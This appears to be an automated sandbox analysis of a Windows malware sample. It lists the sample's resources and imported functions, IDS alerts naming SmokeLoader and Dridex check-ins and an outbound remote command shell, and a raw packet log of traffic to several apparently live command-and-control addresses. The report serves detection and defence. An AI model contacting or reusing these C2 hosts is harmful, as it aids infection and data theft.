RT_ICON | 0x6bc68 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.4930327868852459
RT_ICON | 0x6bc68 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.4930327868852459
RT_ICON | 0x6c5f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.4512411347517731
RT_ICON | 0x6c5f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.4512411347517731
RT_ICON | 0x6cac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.3784648187633262
RT_ICON | 0x6cac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.3784648187633262
RT_ICON | 0x6d968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.5058664259927798
RT_ICON | 0x6d968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.5058664259927798
RT_ICON | 0x6e210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.5599078341013825
RT_ICON | 0x6e210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.5599078341013825
RT_ICON | 0x6e8d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.583092485549133
RT_ICON | 0x6e8d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.583092485549133
RT_ICON | 0x6ee40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.37053941908713695
RT_ICON | 0x6ee40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.37053941908713695
RT_ICON | 0x713e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.41228893058161353
RT_ICON | 0x713e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.41228893058161353
RT_ICON | 0x72490 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.40081967213114755
RT_ICON | 0x72490 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.40081967213114755
RT_ICON | 0x72e18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.46897163120567376
RT_ICON | 0x72e18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.46897163120567376
RT_ICON | 0x732f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.3742004264392324
RT_ICON | 0x732f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.3742004264392324
RT_ICON | 0x741a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.5171480144404332
                                                                                                                                      RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5171480144404332
                                                                                                                                      RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6059907834101382
                                                                                                                                      RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6059907834101382
                                                                                                                                      RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6596820809248555
                                                                                                                                      RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6596820809248555
                                                                                                                                      RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.487551867219917
                                                                                                                                      RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.487551867219917
                                                                                                                                      RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5060975609756098
                                                                                                                                      RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5060975609756098
                                                                                                                                      RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.4860655737704918
                                                                                                                                      RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.4860655737704918
                                                                                                                                      RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5390070921985816
                                                                                                                                      RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5390070921985816
                                                                                                                                      RT_DIALOG0x7dc300x58data0.8977272727272727
                                                                                                                                      RT_STRING0x7dc880x2c6dataTamilIndia0.4830985915492958
                                                                                                                                      RT_STRING0x7dc880x2c6dataTamilSri Lanka0.4830985915492958
                                                                                                                                      RT_STRING0x7df500x6b4dataTamilIndia0.42657342657342656
                                                                                                                                      RT_STRING0x7df500x6b4dataTamilSri Lanka0.42657342657342656
                                                                                                                                      RT_STRING0x7e6080x242dataTamilIndia0.4982698961937716
                                                                                                                                      RT_STRING0x7e6080x242dataTamilSri Lanka0.4982698961937716
                                                                                                                                      RT_STRING0x7e8500x620dataTamilIndia0.4343112244897959
                                                                                                                                      RT_STRING0x7e8500x620dataTamilSri Lanka0.4343112244897959
                                                                                                                                      RT_STRING0x7ee700x292dataTamilIndia0.4817629179331307
                                                                                                                                      RT_STRING0x7ee700x292dataTamilSri Lanka0.4817629179331307
                                                                                                                                      RT_ACCELERATOR0x79b300x48dataTamilIndia0.8472222222222222
                                                                                                                                      RT_ACCELERATOR0x79b300x48dataTamilSri Lanka0.8472222222222222
                                                                                                                                      RT_GROUP_CURSOR0x79fd80x22data1.0294117647058822
                                                                                                                                      RT_GROUP_CURSOR0x7bcb80x30data0.9375
                                                                                                                                      RT_GROUP_CURSOR0x7d9a00x30data0.9375
                                                                                                                                      RT_GROUP_ICON0x6ca580x68dataTamilIndia0.7019230769230769
                                                                                                                                      RT_GROUP_ICON0x6ca580x68dataTamilSri Lanka0.7019230769230769
                                                                                                                                      RT_GROUP_ICON0x668f80x68dataTamilIndia0.6826923076923077
                                                                                                                                      RT_GROUP_ICON0x668f80x68dataTamilSri Lanka0.6826923076923077
                                                                                                                                      RT_GROUP_ICON0x732800x76dataTamilIndia0.6779661016949152
                                                                                                                                      RT_GROUP_ICON0x732800x76dataTamilSri Lanka0.6779661016949152
                                                                                                                                      RT_GROUP_ICON0x79ab80x76dataTamilIndia0.6779661016949152
                                                                                                                                      RT_GROUP_ICON0x79ab80x76dataTamilSri Lanka0.6779661016949152
                                                                                                                                      RT_VERSION0x7d9d00x25cdata0.5413907284768212
DLL | Import
KERNEL32.dll | InterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, CreateJobObjectA, EnumCalendarInfoW, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, GlobalFree, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, LCMapStringW, EnumCalendarInfoA, InterlockedIncrement, CommConfigDialogA, GetConsoleAliasExesA, GetLocaleInfoA, SetFilePointer, VerifyVersionInfoW, WriteConsoleW, CloseHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, SetStdHandle, CreateFileW
GDI32.dll | GetCharWidthI, CreateDCA, CreateDCW, GetCharWidth32A
ADVAPI32.dll | ReadEventLogW
ole32.dll | CoSuspendClassObjects
WINHTTP.dll | WinHttpOpen, WinHttpCheckPlatform
Language of compilation system | Country where language is spoken | Map
Tamil | India |
Tamil | Sri Lanka |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T03:14:22.194672+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49736 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:23.607928+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49737 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:24.986323+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49738 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:26.372379+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49739 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:27.804881+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49740 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:29.188524+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49741 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:30.567066+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49742 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:31.967427+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49743 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:33.349888+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49744 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:34.724537+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49745 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:36.129091+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49746 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:37.511221+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49747 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:38.888606+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49748 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:40.294985+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49749 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:41.687004+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49750 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:43.070323+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49751 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:44.453846+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49752 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:46.078180+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49753 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:47.954405+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49754 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:49.384205+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49755 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:50.822470+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49756 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:52.232319+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49758 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:53.619316+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49759 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:55.012096+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49760 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:57.758027+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49773 | 180.75.11.133 | 80 | TCP
2024-10-08T03:14:59.141611+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49784 | 180.75.11.133 | 80 | TCP
2024-10-08T03:15:00.543733+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49795 | 180.75.11.133 | 80 | TCP
2024-10-08T03:15:01.943079+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49803 | 180.75.11.133 | 80 | TCP
2024-10-08T03:15:03.347158+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49812 | 180.75.11.133 | 80 | TCP
2024-10-08T03:15:04.734946+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49822 | 180.75.11.133 | 80 | TCP
2024-10-08T03:15:06.122207+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49831 | 180.75.11.133 | 80 | TCP
2024-10-08T03:15:07.506497+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49841 | 180.75.11.133 | 80 | TCP
2024-10-08T03:15:19.207418+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49915 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:19.556728+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49915 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:19.731852+0200 | 2829848 | ETPRO MALWARE SmokeLoader encrypted module (3) | 2 | 23.145.40.168 | 443 | 192.168.2.4 | 49915 | TCP
2024-10-08T03:15:20.940399+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49924 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:21.301374+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49924 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:21.924039+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49935 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:22.202449+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49935 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:23.127857+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49942 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:23.407326+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49942 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:24.007314+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49951 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:24.284045+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49951 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:24.904929+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49959 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:25.174280+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49959 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:25.814603+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49965 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:26.096204+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49965 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:26.719338+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49971 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:27.035482+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49971 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:27.642402+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49977 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:27.919881+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49977 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:28.579765+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49983 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:28.860193+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49983 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:29.478717+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49989 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:29.756748+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49989 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:30.411627+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 49995 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:30.634802+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 49995 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:31.283857+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50001 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:31.568650+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 50001 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:32.191015+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50008 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:32.467294+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 50008 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:33.069306+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50015 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:33.339954+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 50015 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:33.957275+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50024 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:34.238068+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 50024 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:34.867331+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50030 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:35.149562+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 50030 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:36.316479+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50036 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:36.592551+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 50036 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:37.218884+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50043 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:38.491915+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 50043 | 23.145.40.168 | 443 | TCP
2024-10-08T03:15:43.167928+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50055 | 23.145.40.168 | 443 | TCP
2024-10-08T03:16:17.332902+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50056 | 180.75.11.133 | 80 | TCP
2024-10-08T03:16:25.215333+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50057 | 180.75.11.133 | 80 | TCP
2024-10-08T03:16:35.175377+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50058 | 180.75.11.133 | 80 | TCP
2024-10-08T03:16:47.543160+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50059 | 180.75.11.133 | 80 | TCP
2024-10-08T03:16:57.444928+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50060 | 23.145.40.168 | 443 | TCP
2024-10-08T03:16:57.772199+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 50060 | 23.145.40.168 | 443 | TCP
2024-10-08T03:16:58.438011+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 50061 | 23.145.40.168 | 443 | TCP
2024-10-08T03:16:58.803947+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.4 | 50061 | 23.145.40.168 | 443 | TCP
                                                                                                                                      2024-10-08T03:17:02.272122+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450062201.103.8.13580TCP
                                                                                                                                      2024-10-08T03:17:16.307008+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006323.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:16.585580+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006323.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:20.704358+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450064201.103.8.13580TCP
                                                                                                                                      2024-10-08T03:17:34.328112+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:34.688036+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:38.839751+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450066201.103.8.13580TCP
                                                                                                                                      2024-10-08T03:17:51.835614+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006723.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:52.198933+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006723.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:56.257177+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450068201.103.8.13580TCP
                                                                                                                                      2024-10-08T03:18:03.951900+02002019082ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND1192.168.2.45006923.145.40.113443TCP
                                                                                                                                      2024-10-08T03:18:03.968253+02002019082ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND1192.168.2.45006923.145.40.113443TCP
                                                                                                                                      Oct 8, 2024 03:14:37.513612986 CEST4974880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:37.516464949 CEST8049747180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:37.519033909 CEST8049748180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:37.519123077 CEST4974880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:37.519217014 CEST4974880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:37.519237995 CEST4974880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:37.524388075 CEST8049748180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:37.524463892 CEST8049748180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:38.888278961 CEST8049748180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:38.888535976 CEST8049748180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:38.888606071 CEST4974880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:38.888647079 CEST4974880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:38.890907049 CEST4974980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:38.893678904 CEST8049748180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:38.895818949 CEST8049749180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:38.896028042 CEST4974980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:38.896028042 CEST4974980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:38.896028042 CEST4974980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:38.900960922 CEST8049749180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:38.901268959 CEST8049749180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:40.294745922 CEST8049749180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:40.294806957 CEST8049749180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:40.294985056 CEST4974980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:40.294985056 CEST4974980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:40.297307014 CEST4975080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:40.300010920 CEST8049749180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:40.302263975 CEST8049750180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:40.302362919 CEST4975080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:40.302452087 CEST4975080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:40.305581093 CEST4975080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:40.307780027 CEST8049750180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:40.310612917 CEST8049750180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:41.686357021 CEST8049750180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:41.686829090 CEST8049750180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:41.687004089 CEST4975080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:41.687005043 CEST4975080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:41.689197063 CEST4975180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:41.692786932 CEST8049750180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:41.694791079 CEST8049751180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:41.694856882 CEST4975180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:41.694941998 CEST4975180192.168.2.4180.75.11.133
